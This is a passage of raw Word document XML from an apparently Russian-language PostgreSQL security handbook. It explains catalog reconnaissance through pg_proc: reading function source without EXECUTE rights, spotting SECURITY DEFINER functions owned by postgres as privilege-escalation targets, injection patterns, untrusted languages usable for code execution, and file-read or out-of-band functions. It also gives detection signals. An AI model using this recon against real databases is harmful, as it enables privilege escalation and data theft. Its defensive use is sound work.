        <w:t>plpythonu</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (untrusted): тело видно атакующему, даже если у него нет EXECUTE на эту функцию.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C956235" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'schema.name(types)'::regprocedure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — input-парсер типа </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regprocedure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, разрешает имя функции в её OID с учётом перегрузок (несколько функций с одним именем и разными аргументами). Альтернатива </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regproc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — работает только для функций без перегрузок и принимает имя без типов аргументов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E53F08" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Атакующий получает:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AAFDD16" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Карту функций с пометкой SECURITY DEFINER + owner=postgres</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — список целей для 3.13. Каждый такой вызов из application-сессии исполняется с правами postgres → если внутри функции есть инъекция через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('%s', $1)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или конкатенацию, это путь к superuser. Эта связка — стандартный chain в реальных пост-эксплуатациях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C18443" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Тело функций</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — поиск SQL-инъекций внутри plpgsql/sql функций по паттернам </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE format('%s'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">EXECUTE 'SELECT ' || </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>EXECUTE 'INSERT INTO ' ||</w:t>
      </w:r>
      <w:r>
        <w:t>. Эти паттерны разобраны в 3.16 (Identifier injection в plpgsql).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FBCE10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Список доступных языков</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — fingerprint, какие RCE-вектора из 3.7 применимы (plperlu, plpython3u, plsh → 3.7.2/3.7.3).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="681D1FD7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Хинты по схеме данных</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — имена таблиц и колонок, упоминаемые внутри функций, экономят отдельный recon к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_class</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_attribute</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (3.8.1).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="405B67C0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Список extension-функций</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE p.proname LIKE 'dblink%'</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'lo\_%'</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'pg\_read%'</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для проверки, какие OOB/file-read функции (3.6) установлены и доступны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA81921" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D8BB71" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — реальная таблица в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, SELECT на неё выдан </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>PUBLIC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через дефолтные GRANT-ы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>template1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Применимо ко всем колонкам, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t>. Решение исторически связано с переносимостью кода: ORM, мигратор, IDE-инспектор ожидают возможность читать pg_proc без специальных прав.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099B973A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> для интерпретируемых языков (plpgsql, sql, plperl, plpython) — полный исходник функции. Для C-функций — символ в .so (например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int4eq</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Право EXECUTE на функцию </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не требуется для чтения её исходного кода</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — только для вызова. Это асимметрия, на которой держится Payload B.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31052FE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_function_arguments(oid)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_function_result(oid)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_functiondef(oid)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_userbyid(oid)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_function_identity_arguments(oid)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — все доступны PUBLIC. Группа «pg_get_*» специально спроектирована для интроспекции и не делает дополнительных проверок прав.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0AEA90" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proowner</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это OID роли. Каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::regrole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> или функция </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_userbyid()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> конвертирует в имя; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>regrole</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> доступен с PG 9.5+.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50D55AA5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosecdef</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — boolean-флаг колонки </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t>. Не зависит от прав, виден всем.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24035EF5" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'name(types)'::regprocedure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> парсит имя на этапе AST-build, проверяет существование и однозначность (если перегрузки разрешены не точно — ошибка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>function name(...) is not unique</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="305EAFE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B8DFA2B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 14–17 (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> стабилен с 7.x; добавляются новые колонки в новых major — например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosupport</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PG 12, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosqlbody</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в PG 14 — но </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>proname</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prolang</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosecdef</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> есть везде).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C31CA3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не требуются.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682E6AF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегии:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PUBLIC на чтение всех колонок </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, включая </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.8.0</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57CA3FB9" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> работает при любых дефолтах. Известный edge case: с PG 14 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc.prosqlbody</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (SQL-стандартное тело SQL-функций без оборачивания в строку, появилось в SQL:1999) хранится отдельно от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, и для таких функций </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> пустой. Для них использовать </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_get_functiondef()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — она объединяет оба пути.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FB8CAE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415094FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Чтение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_proc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>application-роли</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stat_statements</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — почти всегда атака. Легитимные читатели: миграторы (Alembic при </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>alembic current</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> сверяет существование функций), ORM-reflection (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SQLAlchemy</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>inspect(engine).get_functions(schema=...)</w:t>
      </w:r>
      <w:r>
        <w:t>), DBA-сессии. Application в runtime запросах функции не интроспектирует.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B700347" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Чтение </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>prosrc</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от application — однозначный сигнал атаки или утечки credentials через тестовый скрипт. Легитимного use case в production-коде нет.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A8712" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
